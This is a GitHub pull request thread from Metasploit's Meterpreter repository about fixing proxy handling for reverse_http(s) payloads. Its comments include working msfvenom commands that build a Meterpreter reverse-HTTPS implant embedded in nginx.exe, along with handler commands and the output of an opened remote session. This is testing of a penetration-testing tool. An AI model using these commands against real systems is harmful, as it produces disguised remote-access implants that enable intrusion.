search

rapid7 / meterpreter

THIS REPO IS OBSOLETE. USE https://github.com/rapid7/metasploit-payloads INSTEAD
Other
326 stars 144 forks source link

Fix up WinHTTP proxy implementation #143

Closed OJ closed 9 years ago

OJ commented 9 years ago

These changes correct a few logic issues that were in place in the proxy handling for the WinHTTP implementation:

  1. Proxy condition check was inverted.
  2. Proxy username and password must be set on the request, and not the session handle.

    Verification

    • [ ] reverse_http(s) payloads now correctly handle the proxy, proxy username and proxy password setings.

Testing of this can be done in a similar way to HD's PR here: https://github.com/rapid7/metasploit-framework/pull/4934

Note, the MSF-side changes that are listed in the following PR are required as well: https://github.com/rapid7/metasploit-framework/pull/5045

metasploit-public-bot commented 9 years ago

Test PASSED. Refer to this link for build results (access rights to CI server needed): https://ci.metasploit.com//job/GPR-MeterpreterWin/167/ Test PASSED.

bcook-r7 commented 9 years ago

Works well with tinyproxy, let me try squid too. conf file:

User nobody
Group nobody
Port 8888
Timeout 600
StatFile "/tmp/tinyproxy-stats.html"
LogFile "/tmp/tinyproxy.log"
LogLevel Info
PidFile "/tmp/tinyproxy.pid"
Allow 127.0.0.1
Allow 192.168.56.102
ViaProxyName "tinyproxy"
FilterURLs Off
FilterDefaultDeny No

payload

./msfvenom -p windows/meterpreter_reverse_https LHOST=192.168.56.1 EXTENSIONS=stdapi PayloadProxyHost=192.168.56.1 PayloadProxyPort=8888 -x nginx.exe -f exe -o proxy.exe

test

./msfconsole -qx "use exploit/multi/handler; set payload windows/meterpreter_reverse_https; set lhost 192.168.56.1; run"
payload => windows/meterpreter_reverse_https
lhost => 192.168.56.1
[*] Started HTTPS reverse handler on https://0.0.0.0:8443/
[*] Starting the payload handler...
[*] 192.168.56.1:50160 Request received for /b7pY_Y62FXRA2zvNkXHZ6/...
[*] Incoming orphaned or stageless session b7pY_Y62FXRA2zvNkXHZ6, attaching...
[*] Meterpreter session 1 opened (192.168.56.1:8443 -> 192.168.56.1:50160) at 2015-04-01 22:03:13 -0500

meterpreter > sysinfo
Computer        : WINDOWS-8-VM
OS              : Windows 8 (Build 9200).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
bcook-r7 commented 9 years ago

The squid liked it too (btw, mac homebrew comes with the most sensible default squid.conf):

payload

./msfvenom -p windows/meterpreter_reverse_https LHOST=192.168.56.1 EXTENSIONS=stdapi PayloadProxyHost=192.168.56.1 PayloadProxyPort=3128 PayloadProxyUser=myproxyuser PayloadProxyPass=MyProxyPass -x nginx.exe -f exe -o proxy.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Saved as: proxy.exe

a squid says:

1427944867.661    374 192.168.56.102 TCP_MISS/200 1690 CONNECT 192.168.56.1:8443 - HIER_DIRECT/192.168.56.1 -

session

./msfconsole -qx "use exploit/multi/handler; set payload windows/meterpreter_reverse_https; set lhost 192.168.56.1; run"
payload => windows/meterpreter_reverse_https
lhost => 192.168.56.1
[*] Started HTTPS reverse handler on https://0.0.0.0:8443/
[*] Starting the payload handler...
[*] 192.168.56.1:50488 Request received for /htP6_bkNk7fFmmtxrADHw/...
[*] Incoming orphaned or stageless session htP6_bkNk7fFmmtxrADHw, attaching...
[*] Meterpreter session 1 opened (192.168.56.1:8443 -> 192.168.56.1:50488) at 2015-04-01 22:21:07 -0500
OJ commented 9 years ago

Thanks Brent!